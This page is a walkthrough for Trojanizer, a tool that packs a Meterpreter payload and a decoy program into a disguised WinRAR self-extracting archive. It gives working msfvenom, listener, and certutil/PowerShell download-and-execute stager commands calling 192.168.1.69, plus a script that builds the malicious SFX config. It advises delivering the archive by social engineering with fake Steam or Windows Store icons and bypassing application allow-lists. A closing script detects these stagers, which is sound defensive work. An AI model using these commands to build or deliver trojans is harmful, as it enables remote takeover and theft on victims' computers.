Zenity (bash GUIs) | Wine (x86|x64) | WinRAR.exe (installed in Wine)
“Trojanizer.sh will download/install all dependencies as they are needed”
It is recommended to edit and configure the option SYSTEM_ARCH=[ your_sys_arch ] in the ‘settings’ file before attempting to run the tool for the first time.
PAYLOADS (agents) ACCEPTED
.exe | .bat | .vbs | .ps1
“All payloads that windows/SFX can auto-extract-execute”
HINT: If ‘SINGLE_EXEC=ON’ is selected in the settings file, then Trojanizer will accept a payload with any file extension as input.
LEGIT APPLICATIONS ACCEPTED (decoys)
.exe | .bat | .vbs | .ps1 | .jpg | .bmp | .doc | .ppt | etc ..
“All applications that windows/SFX can auto-extract-execute”
TROJANIZER AND APPLICATION WHITELISTING BYPASSES
(the stager below runs through built-in, Microsoft-signed binaries such as certutil.exe and powershell.exe, rather than through the unsigned payload itself, which is what lets it pass a naive allow-list)
1º – use metasploit to build our payload
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.69 LPORT=666 -f exe -o payload.exe
2º – copy payload.exe to apache2 webroot and start service
cp payload.exe /var/www/html/payload.exe
service apache2 start
3º – edit Trojanizer ‘settings’ file and activate:
4º – running trojanizer tool
PAYLOAD TO BE COMPRESSED => /screenshot.png (it will not matter what you compress)
EXECUTE THIS FILE UPON EXTRACTION => /AngryBirds.exe (to be executed as decoy application)
PRESETUP SANDBOX => cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\payload.exe & start "" %TEMP%\payload.exe
(certutil takes the URL and the output path as plain arguments, no comma between them, and the second command is chained with cmd's & operator; Start-Process is PowerShell syntax and would not work under cmd.exe /c)
SFX FILENAME => AngryBirds_installer (the name of the sfx archive to be created)
REPLACE ICON => Windows-Store.ico OR Steam-logo.ico
5º – start a listener, and send the sfx archive to the target using social engineering
msfconsole -x 'use exploit/multi/handler; set payload windows/meterpreter/reverse_tcp; set lhost 192.168.1.69; set lport 666; exploit'
When the sfx archive is executed, it will download payload.exe from our apache2 webserver to the target and execute it before extracting ‘screenshot.png’ and ‘AngryBirds.exe’ (the last one will be executed to serve as the decoy).
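The five steps above, reduced to the two artefacts that actually matter: the WinRAR SFX script (the "archive comment" that carries the Presetup/Setup commands) and the rar.exe command line that consumes it under Wine. This is an added example, not Trojanizer's own code; the function names, the RAR_EXE path, the temp-file location and the accepted_ext helper (which mirrors the payload-extension rule and the SINGLE_EXEC hint from the settings section) are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not Trojanizer's own code: reproduces the "trojan behaviour"
# of the walkthrough as a WinRAR SFX script plus the rar.exe command line
# that would build the archive under Wine. Function names, RAR_EXE and the
# temp-file location are assumptions of this example, not from the page.
set -eu

SINGLE_EXEC="${SINGLE_EXEC:-OFF}"   # mirrors the settings-file option
RAR_EXE="${RAR_EXE:-$HOME/.wine/drive_c/Program Files/WinRAR/Rar.exe}"  # assumed path

# accepted_ext FILE -> 0 if FILE may be used as a payload, 1 otherwise.
# The page lists .exe .bat .vbs .ps1; SINGLE_EXEC=ON lifts the restriction.
accepted_ext() {
  ext=$(printf '%s' "${1##*.}" | tr '[:upper:]' '[:lower:]')
  if [ "$SINGLE_EXEC" = "ON" ]; then return 0; fi
  case "$ext" in
    exe|bat|vbs|ps1) return 0 ;;
    *) return 1 ;;
  esac
}

# build_sfx_config DECOY PRESETUP_CMD TITLE -> prints the SFX script.
# WinRAR reads these commands from the archive comment when the SFX runs:
#   TempMode     extract to a temp folder and delete it after Setup finishes
#   Silent=1     no extraction dialog
#   Overwrite=1  overwrite existing files without asking
#   Presetup=    runs BEFORE extraction: the download-and-execute stager
#   Setup=       runs AFTER extraction: the decoy the victim expects to see
build_sfx_config() {
  decoy="$1"; presetup="$2"; title="$3"
  cat <<EOF
;The comment below contains SFX script commands
Title=$title
TempMode
Silent=1
Overwrite=1
Presetup=$presetup
Setup=$decoy
EOF
}

# sfx_build_cmd OUTNAME ICON CONFIG FILE... -> prints the rar.exe invocation.
#   -sfx          build a self-extracting module
#   -z<file>      take the archive comment (our SFX script) from <file>
#   -iicon<file>  set the SFX icon (the REPLACE ICON prompt above)
sfx_build_cmd() {
  out="$1"; icon="$2"; cfg="$3"; shift 3
  printf 'wine "%s" a -sfx -z"%s" -iicon"%s" "%s.exe" %s\n' \
    "$RAR_EXE" "$cfg" "$icon" "$out" "$*"
}

# Demo with the values used in the walkthrough (no network, no Wine call:
# it only writes the script and prints the command that would run).
demo() {
  stager='cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe %TEMP%\payload.exe & start "" %TEMP%\payload.exe'
  cfg="$(mktemp -d)/sfx_config.txt"
  build_sfx_config AngryBirds.exe "$stager" AngryBirds > "$cfg"
  cat "$cfg"
  sfx_build_cmd AngryBirds_installer Steam-logo.ico "$cfg" screenshot.png AngryBirds.exe
}
demo
```

Because Presetup runs before anything is written to disk, the only file the SFX itself drops is the decoy; the payload arrives through certutil, which is why the "PAYLOAD TO BE COMPRESSED" entry can be anything.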
The following one-liner uses the ‘powershell (DownloadFile + start)’ method to achieve the same as the previous ‘certutil’ exercise (the PowerShell expression is quoted so cmd passes it through intact, and start is given an empty "" title argument so the quoted path is not mistaken for a window title):
cmd.exe /c powershell.exe -w hidden -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.69/payload.exe','%TEMP%\payload.exe')" & start "" "%TEMP%\payload.exe"
The following one-liner uses the ‘powershell (IEX + DownloadString)’ method to achieve almost the same (payload.ps1 is executed in memory and does not touch disk):
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
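The three stagers above (certutil -urlcache, PowerShell DownloadFile + start, PowerShell IEX + DownloadString) are what a defender sees in process-creation telemetry, so here is the other side of the exercise: simple detection logic run over a few constructed command lines. This is an added example, not from the page or the Trojanizer project; the rule names, the regexes and the sample log are this example's own assumptions.

```shell
#!/usr/bin/env bash
# Added example, not from the page or the Trojanizer project: detection
# logic for the stagers shown above, run over a constructed sample of
# process-creation command lines. Rule names and sample log are assumptions.
set -eu

_m() { printf '%s\n' "$1" | grep -qiE "$2"; }   # case-insensitive ERE match

# classify_cmdline CMDLINE -> prints one matching rule name per line and
# returns 0; prints nothing and returns 1 when nothing suspicious matches.
classify_cmdline() {
  l="$1"; hit=1
  # certutil used as a downloader (-urlcache with -f forces a fresh fetch)
  _m "$l" 'certutil(\.exe)?.*-urlcache'                 && { echo certutil_urlcache; hit=0; }
  # PowerShell started with a hidden window, as both one-liners above do
  _m "$l" 'powershell(\.exe)?.*-w(indowstyle)? +hidden' && { echo powershell_hidden_window; hit=0; }
  # WebClient download of a file or of a script body
  _m "$l" 'downloadfile|downloadstring'                 && { echo webclient_download; hit=0; }
  # in-memory cradle: IEX fed by DownloadString, nothing touches disk
  _m "$l" '(iex|invoke-expression).*downloadstring'     && { echo powershell_iex_cradle; hit=0; }
  # an executable launched out of the user's temp dir (where %TEMP% expands)
  _m "$l" 'appdata\\local\\temp\\[^ ]*\.exe'            && { echo exec_from_temp; hit=0; }
  return $hit
}

# scan_log < LINES -> prints "ALERT [rule,rule] cmdline" for each hit
scan_log() {
  while IFS= read -r line; do
    rules=$(classify_cmdline "$line" | tr '\n' ',' | sed 's/,$//')
    if [ -n "$rules" ]; then printf 'ALERT [%s] %s\n' "$rules" "$line"; fi
  done
  return 0
}

# count_alerts < LINES -> number of alerting lines
count_alerts() { scan_log | { grep -c '^ALERT' || true; }; }

# Constructed sample: two benign lines, the three stagers, one benign certutil
SAMPLE_LOG=$(cat <<'EOF'
C:\Windows\System32\notepad.exe C:\Users\bob\Desktop\notes.txt
cmd.exe /c certutil -urlcache -split -f http://192.168.1.69/payload.exe C:\Users\bob\AppData\Local\Temp\payload.exe & start "" C:\Users\bob\AppData\Local\Temp\payload.exe
cmd.exe /c powershell.exe -w hidden -c "(new-object System.Net.WebClient).DownloadFile('http://192.168.1.69/payload.exe','C:\Users\bob\AppData\Local\Temp\payload.exe')" & start "" "C:\Users\bob\AppData\Local\Temp\payload.exe"
cmd.exe /c powershell.exe -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.1.69/payload.ps1'))"
certutil -hashfile C:\Users\bob\Downloads\setup.msi SHA256
powershell.exe -Command Get-Process
EOF
)

printf '%s\n' "$SAMPLE_LOG" | scan_log
printf 'alerts: %s\n' "$(printf '%s\n' "$SAMPLE_LOG" | count_alerts)"
```

Note that the IEX variant trips the hidden-window and cradle rules but never the temp-directory rule: with nothing written to disk, command-line and script-block logging are the only places it shows up.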
1º - Download the framework from GitHub
git clone https://github.com/r00t-3xp10it/trojanizer.git
2º - Set file execution permissions
cd trojanizer
sudo chmod +x *.sh
3º - Configure the framework
nano settings
4º - Run the main tool
sudo ./Trojanizer.sh
xsf.conf – execute both files upon extraction (trojan behavior)
Final sfx archive with icon changed
Inside the sfx archive (open with winrar) – trojan behavior
Inside the sfx archive (open with winrar) – single_file_execution
Trojanizer – single_file_execution (not trojan behavior)
Trojanizer – AVG anti-virus fake installer (trojan behavior)